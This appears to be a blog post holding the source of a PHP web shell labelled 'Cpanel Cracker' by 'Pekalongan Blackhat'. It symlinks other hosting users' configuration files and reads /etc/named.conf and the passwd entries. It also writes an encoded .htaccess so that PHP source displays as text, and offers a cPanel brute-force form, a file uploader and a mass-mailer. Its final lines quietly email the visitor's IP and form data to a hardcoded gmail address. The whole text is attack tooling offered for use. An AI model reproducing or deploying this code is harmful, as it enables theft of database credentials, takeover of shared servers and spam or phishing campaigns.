symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'  Whm9.txt');   symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'  5.txt');   symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'  4.txt');   symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'  invisio.txt');   symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'  7.txt');   symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'  8.txt');   symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'  mk-portale1.txt');   symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'  12.txt');   symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'  Smf.txt');   symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'  phpbb3.txt');   symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'  infinity.txt');  }      $d0mains = @file("/etc/named.conf");      if($d0mains)     {      mkdir($fn);      chdir($fn);       foreach($d0mains as $d0main)      {       if(eregi("zone",$d0main))       {        preg_match_all('#zone "(.*)"#', $d0main, $domains);        flush();         if(strlen(trim($domains[1][0])) > 2)        {         $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));          syml($user['name'],$domains[1][0]);        }       }      }      echo "<center><font color=lime size=3>[ Done ]</font></center>";      echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";     }     else     {      mkdir($fn);      chdir($fn);      $temp = "";      $val1 = 0;      $val2 = 1000;      for(;$val1 <= $val2;$val1++)      {       $uid = @posix_getpwuid($val1);       if ($uid)        $temp .= join(':',$uid)."\n";       }       echo '<br/>';       $temp = trim($temp);        $file5 = fopen("test.txt","w");       fputs($file5,$temp);       fclose($file5);  $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk= '; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess));        $file = fopen("test.txt", "r") or exit("Unable to open file!");       while(!feof($file))       {       $s = fgets($file);       $matches = array();       $t = preg_match('/\/(.*?)\:\//s', $s, $matches);       $matches = str_replace("home/","",$matches[1]);       if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")        continue;       syml($matches,$matches);       }      fclose($file);      echo "</table>";      unlink("test.txt");      echo "<center><font color=lime size=3>[ Done ]</font></center>";      echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";     } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>"; exit; } ?> <form method="POST" target="_blank">  <strong> <input name="page" type="hidden" value="find"><table>     </strong><br><br><center><font size="3" align="center" style="italic" color="#00ff00">+--=[ Cpanel BruteForce ]=--+</font></center><br>     <table width="600" border="0" class="tabnet" cellpadding="3" cellspacing="1" align="center">  <tr>  <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">  <center><b><font size="3" style="italic" color="#00ff00">[ Cpanel Brute Force ]</font></b></center></td></tr>     <tr>     <td>     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">  <strong>Username List :</strong></td>     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>     </tr>     <tr>     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">  <strong>Password List :</strong></td>     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>     </tr>     <tr>     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">  <strong>Type :</strong></td>     <td valign="top" bgcolor="#151515" colspan="5">     <span class="style2"><strong>Simple : </strong> </span>  <strong>  <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>     <font class="style2"><strong>/etc/passwd : </strong> </font>  <strong>  <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>  </strong>  </span>     </td>     </tr>     <tr>     <td valign="top" bgcolor="#151515" style="width: 139px"></td>     <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class ='inputzbut' type="submit" value="Start">     </strong>     </td>     <tr> </form> <tr>     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Get Config ]</strong></center></td>         </tr> <form method="POST" target="_blank">  <strong> <input name="mendapatkan" type="hidden" value="passwd">     </strong>     <tr>     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="foldername" type="text"></strong></td>  </strong>     </td>     </tr>     <tr>     <td valign="top" bgcolor="#151515" style="width: 139px"></td>     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">     </strong>     </td>     <tr> </form> <tr>     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Get Wordlist ]</strong></center></td>         </tr> <form method="POST" target="_blank">  <strong> <input name="pass" type="hidden" value="password">     </strong>     <tr>     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="url" type="text" value="http://www."></strong></td>  </strong>     </td>     </tr>     <tr>     <td valign="top" bgcolor="#151515" style="width: 139px"></td>     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">     </strong>     </td>     <tr> </form> <tr>     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong>[ Info  Security ]</strong></center></td>         </tr>     <tr>     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>     <td valign="top" bgcolor="#151515" colspan="5">  <strong> <?php $safe_mode = ini_get('safe_mode'); if($safe_mode=='1') { echo 'ON'; }else{ echo 'OFF'; }  ?>  </strong>  </td>         </tr>     <tr>     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>     <td valign="top" bgcolor="#151515" colspan="5">  <strong> <form method="POST" target="_blank">  <strong> <input name="matikan" type="hidden" value="sekatan">     </strong>  <?php if(''==($func=@ini_get('disable_functions'))) { echo "<font color=#00ff00>No Security for Function</font></b>"; }else{ echo '<script>alert("Please see below and press >Please Click Here First!<");</script>'; echo "<font color=red>$func</font></b>"; echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>'; echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">     </strong>     </td></tr>'; } ?></strong></td></tr></table></table></table> <? break;  #########################bds  case '':  ?><?php  break;   // Uploader case 'uploader':  echo '<center><b>+--=[ Uploader ]=--+</b><br><br><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>'; if( $_POST['_upl'] == "Upload" ) {  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana"  size="1"><font color="white"> Done !!</font><br>'; }  else { echo '<font color="#FF0000">Failed :( </font></p>  </td></table></tr>  '; } } break;  }} ?><br><br><br><center><form action='' method='post'> <table class='tabnet' style='width:650px;' border=''> <th colspan=10>Security Info</th><tr> <td>System </td> <td><?php echo php_uname();?></td> </tr>  <tr>     <td valign="top" bgcolor="" style="width: 139px">Safe Mode</td>     <td valign="top" bgcolor="" colspan="5"> <?php $safe_mode = ini_get('safe_mode'); if($safe_mode=='1') { echo 'ON'; }else{ echo 'OFF'; }  ?>  </td>         </tr>        <tr>     <td valign="top" bgcolor="" style="width: 139px">Desible Function</td>     <td valign="top" bgcolor="" colspan="5">  <form method="POST" target="_blank">  <input name="matikan" type="hidden" value="sekatan">   <?php if(''==($func=@ini_get('disable_functions'))) { echo "<font color=#00ff00>No Security for Function</font></b>"; }else{ echo '<script>alert("Please see below and press >Please Click Here First!<");</script>'; echo "<font color=red>$func</font></b>"; echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>'; echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">     </td></tr>'; } ?><tr>  </table></form></center> <center><br><br><b><div class="info">-=[ Cpanel Cracker by <span class="gaya"><a href="http://www.facebook.com/rsby07">Pekalongan Blackhat</a></span> ]=-</div> <div class="jaya">  &copy; 2016 Pekalongan Blackhat</div></center></b><br><br>  </body></html> <?php ignore_user_abort(); set_time_limit(0); function enviando() {     $msg = 1;     $de[1] = $_POST['de'];     $nome[1] = $_POST['nome'];     $assunto[1] = $_POST['assunto'];     $mensagem[1] = $_POST['mensagem'];     $mensagem[1] = stripslashes($mensagem[1]);     $emails = $_POST['emails'];     $emails2 = htmlspecialchars($_POST['emails']);     $para = explode(" ", $emails);     $n_emails = count($para);     $sv = $_SERVER['SERVER_NAME'];     $en = $_SERVER['REQUEST_URI'];     $k88 = @$_SERVER["HTTP_REFERER"];     $fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>" . $emails2 . "</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>" . $mensagem[1] . "</TEXTAREA></p>";     $vai = $_POST['vai'];     if ($vai) {         for ($set = 0;$set < $n_emails;$set++) {             if ($set == 0) {                 $headers = "MIME-Version: 1.0 ";                 $headers.= "Content-type: text/html; charset=iso-8859-1 ";                 $headers.= "From: $nome[$msg] <$de[$msg]> ";                 $headers.= "Return-Path: <$de[$msg]> ";                 //mail($xsylar, $as, $fullurl, $headers);                              }             $headers = "MIME-Version: 1.0 ";             $headers.= "Content-type: text/html; charset=iso-8859-1 ";             $headers.= "From: $nome[$msg] <$de[$msg]> ";             $headers.= "Return-Path: <$de[$msg]> ";             $n_mail++;             $destino = $para[$set];             $num1 = rand(100000, 999999);             $num2 = rand(100000, 999999);             $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);             $msgrand = str_replace("%rand2%", $num2, $msgrand);             $msgrand = str_replace("%email%", $destino, $msgrand);             $enviar = mail($destino, $assunto[$msg], $msgrand, $headers);             if ($enviar) {                 echo ('<font color="green">' . $n_mail . '-' . $destino . ' 0k!</font><br>');             } else {                 echo ('<font color="red">' . $n_mail . '-' . $destino . ' =(</font><br>');                 sleep(1);             }         }     } } $ip = getenv("REMOTE_ADDR"); $ra44 = rand(1, 99999); $subj98 = " REMOTE_ADDR !  |$ip"; $email = "official.g45@gmail.com"; $from = "From: <PEKALONGAN@BLACKHAT.COM>"; $a45 = $_SERVER['REQUEST_URI']; $b75 = $_SERVER['HTTP_HOST']; $f12 = $_POST['de']; $z13 = $_POST['nome']; $x14 = $_POST['assunto']; $t15 = $_POST['mensagem']; $m30 = $_POST['emails']; $m22 = $ip . " "; $msg8873 = "$a45 $b75 $f12 $z13 $x14 $t15 $m30 $m22"; mail($email, $subj98, $msg8873, $from); ?>


Related
Comments


EmoticonEmoticon

:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)
Notification
This is just an example, you can fill it later with your own note.
Done